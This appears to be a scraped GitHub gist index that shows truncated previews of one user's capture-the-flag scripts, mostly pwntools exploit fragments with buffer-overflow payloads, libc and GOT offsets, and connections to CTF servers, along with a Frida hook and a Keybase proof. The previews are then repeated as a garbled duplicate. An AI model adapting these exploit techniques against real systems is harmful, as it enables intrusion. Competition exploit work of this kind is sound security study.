Sudhakar Verma sudhackar

## easypwnie.py
from pwn import *
import numpy as np
import sys


'''
0x00019ad3 <+243>:	mov    DWORD PTR [esp],eax
0x00019ad6 <+246>:	call   0x32f50 <exit>

p system

## diapers.py
from pwn import *
local=len(sys.argv)==1
'''
0804b00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804b010  00000207 R_386_JUMP_SLOT   00000000   memcpy
0804b014  00000307 R_386_JUMP_SLOT   00000000   __stack_chk_fail
0804b018  00000407 R_386_JUMP_SLOT   00000000   fread
0804b01c  00000507 R_386_JUMP_SLOT   00000000   puts
0804b020  00000607 R_386_JUMP_SLOT   00000000   __gmon_start__
0804b024  00000707 R_386_JUMP_SLOT   00000000   exit

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                sudhackar
                / keybase.md
            
            
              Last active
              February 14, 2022 13:03
            
              
                Keybase
              
          
    Keybase proof

I hereby claim:

I am sudhackar on github.
I am sudhackar (https://keybase.io/sudhackar) on keybase.
I have a public key whose fingerprint is 285B 7686 8970 789A B6D2  EAFF E6DB 7072 7521 A3FB

To claim this, I am signing this object:

  
## getsocial.py
from pwn import *

s = remote('127.0.0.1',5000)
s.recvuntil('command:')
s.sendline('2')
s.recvuntil('overwrite?')
s.sendline('2')
s.recvuntil('tweet:')
s.sendline('A'*140+p32(0x804918c))
s.recvuntil('command:')

## maze.py
from pwn import *

offset___libc_start_main = 0x0000000000020740
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f6d90
offset_read = 0x00000000000f6670
offset_write = 0x00000000000f66d0
offset_str_bin_sh = 0x18c177

bss = 0x00000000000130b8

## binarypuzzle.py
game = """
.....1...1
1......0..
..0....0..
.00...0..1
1........1
...0..1...
0....1....
.......0.0
0........0

## rhme3-exp.py
from pwn import *
context(arch='amd64', os='linux', log_level='info')

system_main_arena_offset = 0x37f7e8
got_strlen = 0x603040
s = remote("pwn.rhme.riscure.com",1337)

def recv_menu():
    s.recvuntil(": ")

## rhme3-whitebox.py
dword_6661C0 = [1649885203,594050925,1581470779,-1391327847,-1611275700,-1912869808,-599971129,495688880,1480676927,-2013402532,-909651928,1320857042,210015150,-1192689802,-1425012835,-232312589,-1239741301,-1142292876,-1036574509,-1996951722,-198888713,-450216471,1280137767,8427430,-1995564639,-1761340491,731483796,1029862777,1380405299,2024325110,627735913,1179343915,-700764981,1404151492,1721939426,1016365966,-86589174,1705227488,-1290268787,-1495075486,92509344,-1091895950,-2046092117,695105889,1985694731,865175172,-549704763,966230152,543784559,-1108607888,1683309079,1220063190,1464095541,681086870,-1511787424,-2146885969,242443355,-153959166,58824356,-1861873231,-1661672626,-1762466494,41377875,-1595869338,1413829175,-1978722141,580815258,-433373973,159879336,311335354,125068117,1246713891,-1138947449,344759230,1078550063,2086488583,996177789,-607527372,2007874300,462003892,444557379,1153215454,377187403,765168784,-382846495,1621145574,-48089607,1203612380,2125118962,1103079640,1968852233,-751292467,564

## frida-socket.js
'use strict';

var connect = new NativeFunction(
	Module.findExportByName(null, "connect"),
	'int',
	['int', 'pointer', 'int']
);

Interceptor.replace(connect, new NativeCallback(function (sockfd, addr, addrlen) {
	console.log(sockfd, addr, addrlen);

## crypto350.py
from pwn import *
context(log_level='info')
s = remote('crypto.chal.csaw.io',1578)

def send_blob(s, data):
    s.recvuntil(': ')
    s.sendline(data)
    print "sent", data
    return
	from pwn import *
	import numpy as np
	import sys


	'''
	0x00019ad3 <+243>: mov DWORD PTR [esp],eax
	0x00019ad6 <+246>: call 0x32f50 <exit>

	p system
	from pwn import *
	local=len(sys.argv)==1
	'''
	0804b00c 00000107 R_386_JUMP_SLOT 00000000 printf
	0804b010 00000207 R_386_JUMP_SLOT 00000000 memcpy
	0804b014 00000307 R_386_JUMP_SLOT 00000000 __stack_chk_fail
	0804b018 00000407 R_386_JUMP_SLOT 00000000 fread
	0804b01c 00000507 R_386_JUMP_SLOT 00000000 puts
	0804b020 00000607 R_386_JUMP_SLOT 00000000 __gmon_start__
	0804b024 00000707 R_386_JUMP_SLOT 00000000 exit
	from pwn import *

	s = remote('127.0.0.1',5000)
	s.recvuntil('command:')
	s.sendline('2')
	s.recvuntil('overwrite?')
	s.sendline('2')
	s.recvuntil('tweet:')
	s.sendline('A'*140+p32(0x804918c))
	s.recvuntil('command:')
	from pwn import *

	offset___libc_start_main = 0x0000000000020740
	offset_system = 0x0000000000045390
	offset_dup2 = 0x00000000000f6d90
	offset_read = 0x00000000000f6670
	offset_write = 0x00000000000f66d0
	offset_str_bin_sh = 0x18c177

	bss = 0x00000000000130b8
	game = """
	.....1...1
	1......0..
	..0....0..
	.00...0..1
	1........1
	...0..1...
	0....1....
	.......0.0
	0........0
	from pwn import *
	context(arch='amd64', os='linux', log_level='info')

	system_main_arena_offset = 0x37f7e8
	got_strlen = 0x603040
	s = remote("pwn.rhme.riscure.com",1337)

	def recv_menu():
	s.recvuntil(": ")
	'use strict';

	var connect = new NativeFunction(
	Module.findExportByName(null, "connect"),
	'int',
	['int', 'pointer', 'int']
	);

	Interceptor.replace(connect, new NativeCallback(function (sockfd, addr, addrlen) {
	console.log(sockfd, addr, addrlen);
	from pwn import *
	context(log_level='info')
	s = remote('crypto.chal.csaw.io',1578)

	def send_blob(s, data):
	s.recvuntil(': ')
	s.sendline(data)
	print "sent", data
	return